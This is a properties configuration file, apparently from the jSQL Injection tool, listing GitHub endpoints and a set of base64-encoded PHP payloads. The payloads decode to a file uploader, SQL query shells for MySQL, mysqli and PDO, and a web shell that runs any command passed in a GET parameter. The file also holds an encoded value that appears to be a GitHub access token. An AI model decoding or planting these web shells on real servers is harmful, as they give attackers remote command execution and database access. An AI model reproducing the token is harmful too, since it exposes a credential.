jsql.version = 0.104

github.url = https://github.com/ron190/jsql-injection
github.issues.url = https://api.github.com/repos/ron190/jsql-injection/issues
github.token = Z2hwX3FPcVpvWU1BRUVhUlFiY3JSMHNFT3BGaGtIVks1SzNud3gwVg

github.webservice.url = https://raw.githubusercontent.com/ron190/jsql-injection/master/web/services/jsql-injection.json
github.webservice.i18n.root = https://raw.githubusercontent.com/ron190/jsql-injection/master/model/src/main/resources/i18n/jsql.properties
github.webservice.i18n.locale = https://raw.githubusercontent.com/ron190/jsql-injection/master/model/src/main/resources/i18n/

exploit.upl = PD9waHAgZWNobyBtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndSddWyd0bXBfbmFtZSddLCBnZXRjd2QoKS4nLycuYmFzZW5hbWUoJF9GSUxFU1sndSddWyduYW1lJ10pKT8nJHtzaGVsbC5sZWFkfXknOiduJzsgPz4=
exploit.sql.mysql = PCR7c2hlbGwubGVhZH0+PD9waHAgaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDEpO2VjaG8nPFNRTHI+JztteXNxbF9jb25uZWN0KCJsb2NhbGhvc3QiLCRfR0VUWyd1J10sJF9HRVRbJ3AnXSk7JHJlc3VsdD1teXNxbF9xdWVyeSgkX0dFVFsncSddKTt3aGlsZSgkcm93PW15c3FsX2ZldGNoX2FycmF5KCRyZXN1bHQsTVlTUUxfTlVNKSllY2hvJzx0cj48dGQ+Jyxqb2luKCc8L3RkPjx0ZD4nLCRyb3cpLCc8L3RkPjwvdHI+Jzs/Pjwke3NoZWxsLnRyYWlsfT4=
exploit.sql.mysqli = PCR7c2hlbGwubGVhZH0+PD9waHAgaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDEpO2VjaG8nPFNRTHI+Jztmb3JlYWNoKG15c3FsaV9xdWVyeShteXNxbGlfY29ubmVjdCgibG9jYWxob3N0IiwkX0dFVFsndSddLCRfR0VUWydwJ10pLCRfR0VUWydxJ10pYXMkcm93KWVjaG8nPHRyPjx0ZD4nLGpvaW4oJzwvdGQ+PHRkPicsJHJvdyksJzwvdGQ+PC90cj4nOz8+PCR7c2hlbGwudHJhaWx9Pg==
exploit.sql.pdo = PCR7c2hlbGwubGVhZH0+PD9waHAgaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLDEpOyRkYj1uZXcgUERPKCdteXNxbDonLCRfR0VUWyd1J10sJF9HRVRbJ3AnXSk7ZWNobyc8U1FMcj4nO2ZvcmVhY2goJGRiLT5xdWVyeSgkX0dFVFsncSddKWFzJHJvdyllY2hvJzx0cj48dGQ+Jyxqb2luKCc8L3RkPjx0ZD4nLCRyb3cpLCc8L3RkPjwvdHI+Jzs/Pjwke3NoZWxsLnRyYWlsfT4=
exploit.web = PCR7c2hlbGwubGVhZH0+PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pjwke3NoZWxsLnRyYWlsfT4=
